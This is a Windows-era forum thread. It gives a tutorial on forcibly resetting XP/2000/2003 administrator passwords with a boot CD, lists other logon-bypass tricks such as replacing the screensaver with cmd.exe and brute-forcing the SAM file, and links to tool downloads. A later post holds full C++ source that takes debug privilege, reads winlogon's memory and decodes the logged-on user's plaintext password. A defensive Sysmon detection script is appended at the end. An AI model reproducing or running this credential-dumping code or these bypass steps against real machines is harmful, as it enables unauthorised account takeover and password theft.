2005-12-29, 04:02 PM | #1
Administrator / Moderator
Tutorial - The strongest method for cracking XP/2000/2003 logon passwords
The strongest method for cracking XP, 2000 and 2003 logon passwords! (cracking the super administrator's password)

Source: http://www.rus.net.tw/ http://hs.rus.net.tw/

You constantly see people asking for help because they have forgotten the system administrator password. The answers online are all over the place, but in practice most of them turn out to be useless, and some methods passed on by hearsay (for example deleting the SAM file on a WinXP system) will even crash the system completely. By comparison, using ERD2003 to forcibly change the system administrator's password is simple and easy to do, and it works on 2000/XP/2003. Here is how to use the software.

1. Naturally, download ERD2003 first, unpack it, and burn the image file to a CD.
2. Boot from the CD and enter the interface.
3. After entering "System", ERD2003 will do some configuration of the system's network and other hardware; whenever it asks you to choose, just pick Yes.
4. When configuring the network card the system says the driver has not passed XP certification; ignore that and pick Yes.
5. Next ERD2003 searches your hard disk for all installed systems and lets you choose the one to modify; here I chose win2003. Click OK!
6. You are now on the ERD2003 desktop.
7. Now the key step: click Start - Change Password (in English: Start - Administrative Tools - Locksmith) to enter the forced password-change interface. The dialog that pops up lets you pick the user whose password to change (usually the super administrator, Administrator); once picked you can force a new password without entering the original one, then click NEXT.
8. Done. Click Finish and reboot, then try the password you set. Did you get in? So much for the seemingly tight password protection of XP/2003: one little ERD2003 CD cracks it all...

PS: Other methods circulating online for cracking 2000/XP/2003 passwords:
1. Deleting the SAM file: works on Win2000; on XP and 2003 it is not only ineffective, it locks the system up and makes it completely unusable.
2. Booting WinPE into the console and adding a user by hand with DOS commands: useless unless the administrator password was never set in the first place.
3. Renaming the screensaver, i.e. renaming cmd.exe to logon.scr (by mounting the disk on another machine, of course), booting and waiting 10 minutes for the screensaver, which is now actually a DOS command prompt, and adding a user with the net command: it has been shown that on SP1, SP2 and 2003 the privileges you get in that prompt are not administrator at all, so you cannot add a user.
4. Mounting the hard disk on another machine, copying out the SAM file and brute-forcing it with lc4: possible in theory, but if the password is at all complex the cracking time will be absurdly long.
5. Booting the system from the Windows Key floppy to change the administrator password directly: but I could not find any registration code or keygen for this software online, so it cannot really be used.
6. Issue 14 (2004) of 《大眾軟體》 described a new screensaver cracking method, but in my tests it could not actually crack the password either.

"ERD2003" LiveCD download links (updated 2005/10/3):
http://rapidshare.de/files/5812782/W...part1.rar.html
http://rapidshare.de/files/5813301/W...part2.rar.html
http://rapidshare.de/files/5813313/W...part3.rar.html
Download all three files into the same folder, then unpack with WinRAR.
(From 密技偷偷報 http://totalpost.pcuser.com.tw/2AT124.htm)

Related forum threads:
http://www.slime2.com.tw/forums/show...hlight=ERD2003
http://www.slime2.com.tw/forums/show...hlight=ERD2003
http://www.slime2.com.tw/forums/show...hlight=ERD2003
http://www.slime2.com.tw/forums/show...hlight=ERD2003
http://www.slime2.com.tw/forums/show...hlight=ERD2003
Flowers: 1999
2006-04-28, 07:50 PM | #7 (permalink)
Registered member
Flowers: 18
2006-09-23, 01:56 PM | #8 (permalink)
Honorary member

How to obtain the current user's password on Windows 2000
The original author of the code used in this article is unknown; it was provided by 磨刀老頭, a friend of ccrun, and thanks go to the author. ccrun (老妖) tested it successfully under Win2k.

```cpp
// Obtain the current WinNT/Win2k user name and password by calling this function:
// bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
//---------------------------------------------------------------------------
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _QUERY_SYSTEM_INFORMATION {
    DWORD GrantedAccess;
    DWORD PID;
    WORD  HandleType;
    WORD  HandleId;
    DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;

typedef struct _PROCESS_INFO_HEADER {
    DWORD Count;
    DWORD Unk04;
    DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;

typedef struct _PROCESS_INFO {
    DWORD LoadAddress;
    DWORD Size;
    DWORD Unk08;
    DWORD Enumerator;
    DWORD Unk10;
    char  Name[0x108];
} PROCESS_INFO, *PPROCESS_INFO;

typedef struct _ENCODED_PASSWORD_INFO {
    DWORD    HashByte;
    DWORD    Unk04;
    DWORD    Unk08;
    DWORD    Unk0C;
    FILETIME LoggedOn;
    DWORD    Unk18;
    DWORD    Unk1C;
    DWORD    Unk20;
    DWORD    Unk24;
    DWORD    Unk28;
    UNICODE_STRING EncodedPassword;
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;

typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION)(DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER)(DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION)(DWORD, DWORD, PVOID);
typedef void  (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER)(PVOID);
typedef void  (__stdcall *PFNTRTLRUNDECODEUNICODESTRING)(BYTE, PUNICODE_STRING);

// Private prototypes
BOOL  IsWinNT(void);
BOOL  IsWin2K(void);
BOOL  AddDebugPrivilege(void);
DWORD FindWinLogon(void);
BOOL  LocatePasswordPageWinNT(DWORD, PDWORD);
BOOL  LocatePasswordPageWin2K(DWORD, PDWORD);
void  ReturnWinNTPwd(String &, String &, String &);
void  ReturnWin2kPwd(String &, String &, String &);
bool  GetPassword(String &, String &, String &);

// Global variables
PFNNTQUERYSYSTEMINFORMATION        pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER       pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER      pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING      pfnRtlRunDecodeUnicodeString;
DWORD   dwPwdLen = 0;
PVOID   pvRealPwd = NULL;
PVOID   pvPwd = NULL;
DWORD   dwHashByte = 0;
wchar_t wszUserName[0x400];
wchar_t wszUserDomain[0x400];

//---------------------------------------------------------------------------
bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
    if(!IsWinNT() && !IsWin2K())
    {
        // Only applies to 2000 or XP
        return false;
    }
    // Add debug privilege to PasswordReminder -
    // this is needed for the search for WinLogon.
    if(!AddDebugPrivilege())
    {
        // Could not add the debug privilege
        return false;
    }
    // The debug privilege has been added to this program
    HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL");
    pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)
        GetProcAddress(hNtDll, "NtQuerySystemInformation");
    pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)
        GetProcAddress(hNtDll, "RtlCreateQueryDebugBuffer");
    pfnRtlQueryProcessDebugInformation = (PFNRTLQUERYPROCESSDEBUGINFORMATION)
        GetProcAddress(hNtDll, "RtlQueryProcessDebugInformation");
    pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER)
        GetProcAddress(hNtDll, "RtlDestroyQueryDebugBuffer");
    pfnRtlRunDecodeUnicodeString = (PFNTRTLRUNDECODEUNICODESTRING)
        GetProcAddress(hNtDll, "RtlRunDecodeUnicodeString");

    // Locate WinLogon's PID - needs the debug privilege and admin rights.
    DWORD dwWinLogonPID = FindWinLogon();
    if(!dwWinLogonPID)
    {
        // The WinLogon process was not found, or NWGINA.DLL is in use,
        // so the password cannot be found in memory
        FreeLibrary(hNtDll);
        return false;
    }
    // Format("The WinLogon process id is %d (0x%8.8x).\n",
    //     ARRAYOFCONST(((int)dwWinLogonPID, (int)dwWinLogonPID)));

    // Set the values to check the memory block against.
    memset(wszUserName, 0, sizeof(wszUserName));
    memset(wszUserDomain, 0, sizeof(wszUserDomain));
    GetEnvironmentVariableW(L"USERNAME", wszUserName, 0x400);
    GetEnvironmentVariableW(L"USERDOMAIN", wszUserDomain, 0x400);

    // Locate the block of memory containing
    // the password in WinLogon's memory space.
    BOOL bFoundPasswordPage;
    //bFoundPasswordPage = FALSE;
    if(IsWin2K())
        bFoundPasswordPage = LocatePasswordPageWin2K(dwWinLogonPID, &dwPwdLen);
    else
        bFoundPasswordPage = LocatePasswordPageWinNT(dwWinLogonPID, &dwPwdLen);

    if(bFoundPasswordPage)
    {
        if(dwPwdLen == 0)
        {
            // Format("Logon information: domain:%S/password:%S.\n",
            //     ARRAYOFCONST((wszUserDomain, wszUserName)));
            // The password length is zero: the account has no password
        }
        else
        {
            // Format("Found the password, length %d\n", ARRAYOFCONST(((int)dwPwdLen)));
            // Decode the password string.
            if(IsWin2K())
                ReturnWin2kPwd(strCurrDomain, strCurrUser, strCurrPwd);
            else
                ReturnWinNTPwd(strCurrDomain, strCurrUser, strCurrPwd);
        }
    }
    else
    {
        // The password was not found in memory
        FreeLibrary(hNtDll);
        return false;
    }
    return true;
}
//---------------------------------------------------------------------------
BOOL IsWinNT(void)
{
    OSVERSIONINFO OSVersionInfo;
    OSVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    if(GetVersionEx(&OSVersionInfo))
        return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT);
    else
        return (FALSE);
}
//---------------------------------------------------------------------------
BOOL IsWin2K(void)
{
    OSVERSIONINFO OSVersionInfo;
    OSVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    if(GetVersionEx(&OSVersionInfo))
        return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) &&
                (OSVersionInfo.dwMajorVersion == 5));
    else
        return (FALSE);
}
//---------------------------------------------------------------------------
BOOL AddDebugPrivilege(void)
{
    HANDLE Token;
    TOKEN_PRIVILEGES TokenPrivileges, PreviousState;
    DWORD ReturnLength = 0;
    if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token))
        if(LookupPrivilegeValue(NULL, "SeDebugPrivilege", &TokenPrivileges.Privileges[0].Luid))
        {
            TokenPrivileges.PrivilegeCount = 1;
            TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
            return (AdjustTokenPrivileges(Token, FALSE, &TokenPrivileges,
                        sizeof(TOKEN_PRIVILEGES), &PreviousState, &ReturnLength));
        }
    return (FALSE);
}
//---------------------------------------------------------------------------
// This code was provided by a friend of ccrun (老妖). Questions or suggestions: info@ccrun.com
// Welcome to C++ Builder Research: http://www.ccrun.com
//---------------------------------------------------------------------------
// Note that the following code eliminates the need
// for PSAPI.DLL as part of the executable.
DWORD FindWinLogon(void)
{
#define INITIAL_ALLOCATION 0x100
    DWORD dwRc = 0;
    DWORD dwSizeNeeded = 0;
    PVOID pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION);
    // Find how much memory is required.
    pfnNtQuerySystemInformation(0x10, pvInfo, INITIAL_ALLOCATION, &dwSizeNeeded);
    HeapFree(GetProcessHeap(), 0, pvInfo);
    // Now, allocate the proper amount of memory.
    pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSizeNeeded);
    DWORD dwSizeWritten = dwSizeNeeded;
    if(pfnNtQuerySystemInformation(0x10, pvInfo, dwSizeNeeded, &dwSizeWritten))
    {
        HeapFree(GetProcessHeap(), 0, pvInfo);
        return (0);
    }
    DWORD dwNumHandles = dwSizeWritten / sizeof(QUERY_SYSTEM_INFORMATION);
    if(dwNumHandles == 0)
    {
        HeapFree(GetProcessHeap(), 0, pvInfo);
        return (0);
    }
    PQUERY_SYSTEM_INFORMATION QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION)pvInfo;
    try
    {
        for(DWORD i = 1; i <= dwNumHandles; i++)
        {
            // "5" is the value of a kernel object type process.
            if(QuerySystemInformationP->HandleType == 5)
            {
                PVOID pvDebugBuffer = pfnRtlCreateQueryDebugBuffer(0, 0);
                if(pfnRtlQueryProcessDebugInformation(QuerySystemInformationP->PID, 1, pvDebugBuffer) == 0)
                {
                    PPROCESS_INFO_HEADER pihProcessInfoHeader =
                        (PPROCESS_INFO_HEADER)((DWORD)pvDebugBuffer + 0x60);
                    DWORD dwCount = pihProcessInfoHeader->Count;
                    PPROCESS_INFO piProcessInfo = (PPROCESS_INFO)
                        ((DWORD)pihProcessInfoHeader + sizeof(PROCESS_INFO_HEADER));
                    // Form1->Memo1->Lines->Add(piProcessInfo->Name);
                    AnsiString strName = piProcessInfo->Name;
                    // if(strstr((char *)UpCase(*piProcessInfo->Name), "WINLOGON") != 0)
                    if(strName.UpperCase().Pos("WINLOGON") != 0)
                    {
                        DWORD dwTemp = (DWORD)piProcessInfo;
                        for(DWORD j = 0; j < dwCount; j++)
                        {
                            dwTemp += sizeof(PROCESS_INFO);
                            piProcessInfo = (PPROCESS_INFO)dwTemp;
                            strName = piProcessInfo->Name;
                            if(strName.UpperCase().Pos("NWGINA") != 0)
                                return (0);
                            if(strName.UpperCase().Pos("MSGINA") != 0)
                                dwRc = QuerySystemInformationP->PID;
                        }
                        if(pvDebugBuffer)
                            pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer);
                        HeapFree(GetProcessHeap(), 0, pvInfo);
                        return (dwRc);
                    }
                }
                if(pvDebugBuffer)
                    pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer);
            }
            DWORD dwTemp = (DWORD)QuerySystemInformationP;
            dwTemp += sizeof(QUERY_SYSTEM_INFORMATION);
            QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION)dwTemp;
        }
    }
    catch(...)
    {
    }
    HeapFree(GetProcessHeap(), 0, pvInfo);
    return (dwRc);
}
//---------------------------------------------------------------------------
BOOL LocatePasswordPageWinNT(DWORD dwWinLogonPID, PDWORD pdwPwdLen)
{
#define USER_DOMAIN_OFFSET_WINNT   0x200
#define USER_PASSWORD_OFFSET_WINNT 0x400
    BOOL bRc = FALSE;
    HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                                         FALSE, dwWinLogonPID);
    if(!hWinLogonHandle)
        return (bRc);
    *pdwPwdLen = 0;
    SYSTEM_INFO siSystemInfo;
    GetSystemInfo(&siSystemInfo);
    DWORD dwPEB = 0x7ffdf000;
    DWORD dwBytesCopied = 0;
    PVOID pvEBP = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, siSystemInfo.dwPageSize);
    if(!ReadProcessMemory(hWinLogonHandle, (PVOID)dwPEB, pvEBP,
                          siSystemInfo.dwPageSize, &dwBytesCopied))
    {
        CloseHandle(hWinLogonHandle);
        return (bRc);
    }
    // Grab the value of the 2nd DWORD in the TEB.
    PDWORD pdwWinLogonHeap = (PDWORD)((DWORD)pvEBP + (6 * sizeof(DWORD)));
    MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor;
    if(VirtualQueryEx(hWinLogonHandle, (PVOID)*pdwWinLogonHeap, &mbiMemoryBasicInfor,
                      sizeof(MEMORY_BASIC_INFORMATION)))
        if(((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) &&
           ((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0))
        {
            PVOID pvWinLogonMem = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
                                            mbiMemoryBasicInfor.RegionSize);
            if(ReadProcessMemory(hWinLogonHandle, (PVOID)*pdwWinLogonHeap, pvWinLogonMem,
                                 mbiMemoryBasicInfor.RegionSize, &dwBytesCopied))
            {
                DWORD i = (DWORD)pvWinLogonMem;
                DWORD dwUserNamePos = 0;
                // The order in memory is wszUserName followed by wszUserDomain.
                do
                {
                    if((wcscmp(wszUserName, (wchar_t *)i) == 0) &&
                       (wcscmp(wszUserDomain, (wchar_t *)(i + USER_DOMAIN_OFFSET_WINNT)) == 0))
                    {
                        dwUserNamePos = i;
                        break;
                    }
                    i += 2;
                } while(i < (DWORD)pvWinLogonMem + mbiMemoryBasicInfor.RegionSize);
                if(dwUserNamePos)
                {
                    PENCODED_PASSWORD_INFO pepiEncodedPwdInfo =
                        (PENCODED_PASSWORD_INFO)((DWORD)dwUserNamePos + USER_PASSWORD_OFFSET_WINNT);
                    FILETIME ftLocalFileTime;
                    SYSTEMTIME stSystemTime;
                    if(FileTimeToLocalFileTime(&pepiEncodedPwdInfo->LoggedOn, &ftLocalFileTime))
                        if(FileTimeToSystemTime(&ftLocalFileTime, &stSystemTime))
                        {
                        }
                    // Format("Your logon time is: %d/%d/%d %d:%d:%d\n",
                    //     ARRAYOFCONST((stSystemTime.wMonth, stSystemTime.wDay,
                    //                   stSystemTime.wYear, stSystemTime.wHour,
                    //                   stSystemTime.wMinute, stSystemTime.wSecond)));
                    *pdwPwdLen = (pepiEncodedPwdInfo->EncodedPassword.Length & 0x00ff) / sizeof(wchar_t);
                    dwHashByte = (pepiEncodedPwdInfo->EncodedPassword.Length & 0xff00) >> 8;
                    pvRealPwd = (PVOID)(*pdwWinLogonHeap + (dwUserNamePos - (DWORD)pvWinLogonMem)
                                        + USER_PASSWORD_OFFSET_WINNT + 0x34);
                    pvPwd = (PVOID)((PBYTE)(dwUserNamePos + USER_PASSWORD_OFFSET_WINNT + 0x34));
                    bRc = TRUE;
                }
            }
        }
    HeapFree(GetProcessHeap(), 0, pvEBP);
    CloseHandle(hWinLogonHandle);
    return (bRc);
}
//---------------------------------------------------------------------------
BOOL LocatePasswordPageWin2K(DWORD dwWinLogonPID, PDWORD pdwPwdLen)
{
#define USER_DOMAIN_OFFSET_WIN2K   0x400
#define USER_PASSWORD_OFFSET_WIN2K 0x800
    HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                                         FALSE, dwWinLogonPID);
    if(hWinLogonHandle == 0)
        return (FALSE);
    *pdwPwdLen = 0;
    SYSTEM_INFO siSystemInfo;
    GetSystemInfo(&siSystemInfo);
    DWORD i = (DWORD)siSystemInfo.lpMinimumApplicationAddress;
    DWORD dwMaxMemory = (DWORD)siSystemInfo.lpMaximumApplicationAddress;
    DWORD dwIncrement = siSystemInfo.dwPageSize;
    MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor;
    while(i < dwMaxMemory)
    {
        if(VirtualQueryEx(hWinLogonHandle, (PVOID)i, &mbiMemoryBasicInfor,
                          sizeof(MEMORY_BASIC_INFORMATION)))
        {
            dwIncrement = mbiMemoryBasicInfor.RegionSize;
            if(((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) &&
               ((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0))
            {
                PVOID pvRealStartingAddress = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
                                                        mbiMemoryBasicInfor.RegionSize);
                DWORD dwBytesCopied = 0;
                if(ReadProcessMemory(hWinLogonHandle, (PVOID)i, pvRealStartingAddress,
                                     mbiMemoryBasicInfor.RegionSize, &dwBytesCopied))
                {
                    if((wcscmp((wchar_t *)pvRealStartingAddress, wszUserName) == 0) &&
                       (wcscmp((wchar_t *)((DWORD)pvRealStartingAddress + USER_DOMAIN_OFFSET_WIN2K),
                               wszUserDomain) == 0))
                    {
                        pvRealPwd = (PVOID)(i + USER_PASSWORD_OFFSET_WIN2K);
                        pvPwd = (PVOID)((DWORD)pvRealStartingAddress + USER_PASSWORD_OFFSET_WIN2K);
                        // Calculate the length of the encoded unicode string.
                        PBYTE pbTemp = (PBYTE)pvPwd;
                        DWORD dwLoc = (DWORD)pbTemp;
                        DWORD dwLen = 0;
                        if((*pbTemp == 0) && (*(PBYTE)((DWORD)pbTemp + 1) == 0))
                        {
                        }
                        else
                            do
                            {
                                dwLen++;
                                dwLoc += 2;
                                pbTemp = (PBYTE)dwLoc;
                            } while(*pbTemp != 0);
                        *pdwPwdLen = dwLen;
                        CloseHandle(hWinLogonHandle);
                        return (TRUE);
                    }
                }
                HeapFree(GetProcessHeap(), 0, pvRealStartingAddress);
            }
        }
        else
            dwIncrement = siSystemInfo.dwPageSize;
        // Move to the next memory block.
        i += dwIncrement;
    }
    CloseHandle(hWinLogonHandle);
    return (FALSE);
}
//---------------------------------------------------------------------------
void ReturnWinNTPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
    UNICODE_STRING usEncodedString;
    usEncodedString.Length = (WORD)dwPwdLen * sizeof(wchar_t);
    usEncodedString.MaximumLength = ((WORD)dwPwdLen * sizeof(wchar_t)) + sizeof(wchar_t);
    usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
                                              usEncodedString.MaximumLength);
    CopyMemory(usEncodedString.Buffer, pvPwd, dwPwdLen * sizeof(wchar_t));
    // Finally - decode the password.
    // Note that only one call is required since the hash-byte
    // was part of the originally encoded string.
    pfnRtlRunDecodeUnicodeString((BYTE)dwHashByte, &usEncodedString);
    strCurrDomain = String(wszUserDomain);
    strCurrUser = String(wszUserName);
    strCurrPwd = AnsiString(usEncodedString.Buffer);
    // Format("Your logon information is domain:%S user:%S password:%S\n",
    //     ARRAYOFCONST((wszUserDomain, wszUserName, usEncodedString.Buffer)));
    // Format("The hash byte is: 0x%2.2x.\n", ARRAYOFCONST(((int)dwHashByte)));
    HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer);
}
//---------------------------------------------------------------------------
void ReturnWin2kPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
    // DWORD dwHash = 0;
    UNICODE_STRING usEncodedString;
    usEncodedString.Length = (USHORT)dwPwdLen * sizeof(wchar_t);
    usEncodedString.MaximumLength = ((USHORT)dwPwdLen * sizeof(wchar_t)) + sizeof(wchar_t);
    usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
                                              usEncodedString.MaximumLength);
    // This is a brute force technique since the hash-byte
    // is not stored as part of the encoded string - :>(.
    for(DWORD i = 0; i <= 0xff; i++)
    {
        CopyMemory(usEncodedString.Buffer, pvPwd, dwPwdLen * sizeof(wchar_t));
        // Finally - try to decode the password.
        pfnRtlRunDecodeUnicodeString((BYTE)i, &usEncodedString);
        // Check for a viewable password.
        PBYTE pbTemp = (PBYTE)usEncodedString.Buffer;
        BOOL bViewable = TRUE;
        DWORD j, k;
        for(j = 0; (j < dwPwdLen) && bViewable; j++)
        {
            if((*pbTemp) && (*(PBYTE)(DWORD(pbTemp) + 1) == 0))
            {
                if(*pbTemp < 0x20) bViewable = FALSE;
                if(*pbTemp > 0x7e) bViewable = FALSE;
            }
            else
                bViewable = FALSE;
            k = DWORD(pbTemp);
            k += 2;
            pbTemp = (PBYTE)k;
        }
        if(bViewable)
        {
            strCurrDomain = String(wszUserDomain);
            strCurrUser = String(wszUserName);
            strCurrPwd = String(usEncodedString.Buffer);
            // Format("Your logon information: domain:%S user:%S password:%S\n",
            //     ARRAYOFCONST((wszUserDomain, wszUserName, usEncodedString.Buffer)));
            // Format("The hash byte is: 0x%2.2x.\n", ARRAYOFCONST(((int)i)));
        }
    }
    HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer);
}
//---------------------------------------------------------------------------
// Example call
void __fastcall TForm1::Button1Click(TObject *Sender)
{
    String strCurrDomain, strCurrUser, strCurrPwd;
    GetPassword(strCurrDomain, strCurrUser, strCurrPwd);
    Memo1->Lines->Add(strCurrDomain);
    Memo1->Lines->Add(strCurrUser);
    Memo1->Lines->Add(strCurrPwd);
}
```
Flowers: 3
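From the defender's side, the distinctive step in the code posted above is OpenProcess on winlogon.exe with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ followed by ReadProcessMemory; Sysmon Event ID 10 (ProcessAccess) records exactly that handle grant. The following is an added example, not code from the thread or from ccrun: it flags such records in constructed Sysmon-style events, and the allowlist of source images is an assumption to tune per host.

```python
"""Flag processes that read winlogon.exe memory, the handle pattern used by the
password-dumping code above (OpenProcess with PROCESS_VM_READ, then ReadProcessMemory).
Input: constructed Sysmon Event ID 10 (ProcessAccess) records using Sysmon's field names."""
import re

PROCESS_VM_READ = 0x0010            # Win32 access-right bit the dumper needs
SENSITIVE_TARGETS = ("\\winlogon.exe", "\\lsass.exe")
# Assumed allowlist of system images that legitimately open winlogon; tune per host.
ALLOWED_SOURCES = ("c:\\windows\\system32\\csrss.exe",
                   "c:\\windows\\system32\\wininit.exe")
FIELD_RE = re.compile(r"(\w+):\s*(.*)")

def parse_event(text):
    """Parse the 'Key: value' lines of one Sysmon EID 10 message into a dict."""
    rec = {}
    for line in text.strip().splitlines():
        m = FIELD_RE.match(line.strip())
        if m:
            rec[m.group(1)] = m.group(2).strip()
    return rec

def is_memory_read_of_sensitive_process(rec):
    """True when a non-allowlisted image got PROCESS_VM_READ on a sensitive process."""
    target = rec.get("TargetImage", "").lower()
    source = rec.get("SourceImage", "").lower()
    if not target.endswith(SENSITIVE_TARGETS) or source in ALLOWED_SOURCES:
        return False
    try:
        mask = int(rec.get("GrantedAccess", "0"), 16)   # e.g. "0x410"
    except ValueError:
        return False
    return bool(mask & PROCESS_VM_READ)

def find_alerts(events):
    """Return (SourceImage, TargetImage, GrantedAccess) for each suspicious record."""
    alerts = []
    for text in events:
        rec = parse_event(text)
        if is_memory_read_of_sensitive_process(rec):
            alerts.append((rec["SourceImage"], rec["TargetImage"], rec["GrantedAccess"]))
    return alerts

# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    "Process accessed:\nSourceImage: C:\\Users\\bob\\Desktop\\pwdreminder.exe\n"
    "TargetImage: C:\\WINNT\\system32\\winlogon.exe\nGrantedAccess: 0x410",
    "Process accessed:\nSourceImage: C:\\Windows\\System32\\csrss.exe\n"
    "TargetImage: C:\\Windows\\System32\\winlogon.exe\nGrantedAccess: 0x1FFFFF",
    "Process accessed:\nSourceImage: C:\\Tools\\procmon.exe\n"
    "TargetImage: C:\\Windows\\System32\\winlogon.exe\nGrantedAccess: 0x1000",
]

if __name__ == "__main__":
    for src, dst, mask in find_alerts(SAMPLE_EVENTS):
        print("ALERT: %s read memory of %s (GrantedAccess %s)" % (src, dst, mask))
```

Only the first sample trips the rule: the second comes from an allowlisted image and the third was granted no VM_READ bit.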